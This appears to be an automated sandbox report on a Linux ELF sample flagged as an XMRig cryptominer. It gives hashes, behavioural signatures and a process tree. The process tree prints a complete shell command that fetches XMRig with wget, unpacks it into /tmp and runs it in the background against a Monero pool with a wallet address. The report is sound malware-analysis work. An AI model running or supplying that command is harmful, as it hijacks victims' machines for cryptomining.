Overview

overview

10

Static

static

1

da93f99c9d...74.elf

ubuntu-20.04-amd64

10

Analysis

  • max time kernel
    150s
  • max time network
    134s
  • platform
    ubuntu-20.04_amd64
  • resource
    ubuntu2004-amd64-20240221-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
  • submitted
    21-03-2024 20:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    da93f99c9d6e98e69d2f6fb3558c1b74.elf

  • Size

    28KB

  • MD5

    da93f99c9d6e98e69d2f6fb3558c1b74

  • SHA1

    e2ac9a127c3ff440eb8c45894da95e43b8bf3a18

  • SHA256

    864533db99aade7897c872cffb6e991e166adb370bbad3c0ec969bf646d92dcc

  • SHA512

    74dc76d011aa4c1087e6ce7483d8d4c4573a8815237622cf88863cfb3c6ac3f2278dbfbdbb2bba8dbcfdb9fdf315203cb5343e0088875ee7da2e8c38c9c0360e

  • SSDEEP

    384:McRvMLsiLPfToCQ667Buk3JWuxZ6MiV44vG7iC/PzpL59j2aI8yURza/2ml6AaJB:NRkLnT+I0JWnlV0isF1I8HazldyyGI8

Score
10/10
xmrig_linuxminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig_linux
  • Changes its process name 1 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Reads runtime system information 4 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/da93f99c9d6e98e69d2f6fb3558c1b74.elf
    /tmp/da93f99c9d6e98e69d2f6fb3558c1b74.elf
    1⤵
    • Changes its process name
    • Reads runtime system information
    PID:1466
  • /bin/sh
    sh -c "wget https://github.com/xmrig/xmrig/releases/download/v6.21.1/xmrig-6.21.1-linux-x64.tar.gz && tar -xzf xmrig-6.21.1-linux-x64.tar.gz && mv xmrig-6.21.1 /tmp/ && rm -rf xmrig-6.21.1-linux-x64.tar.gz && cd /tmp/xmrig-6.21.1 && chmod 777 * && ./xmrig --opencl --cuda -o xmr-eu1.nanopool.org:14433 -u 49WVNTHfo5c7zfYi3METsCPW93hLJFYNKBS5GZDxSbuZA1FNJULGvkkY5y7sDozjTTMgeT3JyqLfV38TGzqMPuiGJzeHmeZ --tls --coin monero --background"
    1⤵
      PID:1470
      • /usr/bin/wget
        wget https://github.com/xmrig/xmrig/releases/download/v6.21.1/xmrig-6.21.1-linux-x64.tar.gz
        2⤵
        • Writes file to tmp directory
        PID:1475
      • /usr/bin/tar
        tar -xzf xmrig-6.21.1-linux-x64.tar.gz
        2⤵
        • Reads runtime system information
        • Writes file to tmp directory
        PID:1490
        • /usr/local/sbin/gzip
          gzip -d
          3⤵
            PID:1491
          • /usr/local/bin/gzip
            gzip -d
            3⤵
              PID:1491
            • /usr/sbin/gzip
              gzip -d
              3⤵
                PID:1491
              • /usr/bin/gzip
                gzip -d
                3⤵
                  PID:1491
              • /usr/bin/mv
                mv xmrig-6.21.1 /tmp/
                2⤵
                • Reads runtime system information
                PID:1498

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • /tmp/xmrig-6.21.1-linux-x64.tar.gz
              Filesize

              1.0MB

              MD5

              3f1cd808d5fd5d4bd3c820fb6c12a255

              SHA1

              2d8d627e633caf51b80427f92dd75dd3a3bf51a1

              SHA256

              c426e536e4e048cf201c75c76ba071cdb347833fa8f2275be587ae53dad4fdc7

              SHA512

              1f0ca68b6ca2e0678b39e212312fddfd88fd772cc81cbc148006b49589ebad7e47145dcaa0646dc13cccb88c44a5131d3b2604898299139ce2f6b3cdc95c7bdb

              Download Submit

            • /tmp/xmrig-6.21.1/SHA256SUMS
              Filesize

              150B

              MD5

              0eeaf66a6ba6b6934ffefce538342572

              SHA1

              8f28c8a7345c85b2ae78924828aa16e1b6be7b97

              SHA256

              aa89fb25473e544be6a5cbe6a6106e220fc6cd4b935fe76bc73a19b3b6daed60

              SHA512

              5a8e8a77e97f2b221bf1a9097a2f19a2c3c0ed376d7e2561a41c6d74203ddbe9d0482a818d17555da44088e511b3724dd41dd7cc91e3ebaadab9c176b1a7b57d

              Download Submit

            • /tmp/xmrig-6.21.1/config.json
              Filesize

              2KB

              MD5

              66f38c96a4901e7b345787c447842b3e

              SHA1

              2aa9b4d1bd2edd5d81bd9725e9318edaee67531f

              SHA256

              2b03943244871ca75e44513e4d20470b8f3e0f209d185395de82b447022437ec

              SHA512

              71757fad29d6d2a257362ed28cde9f249cc8a14e646dee666c9029ea97c72de689cdf8ed5cf0365195a6a6831fe77d82efe5e2fa555c6cc5078f1f29ae8dd68f

              Download Submit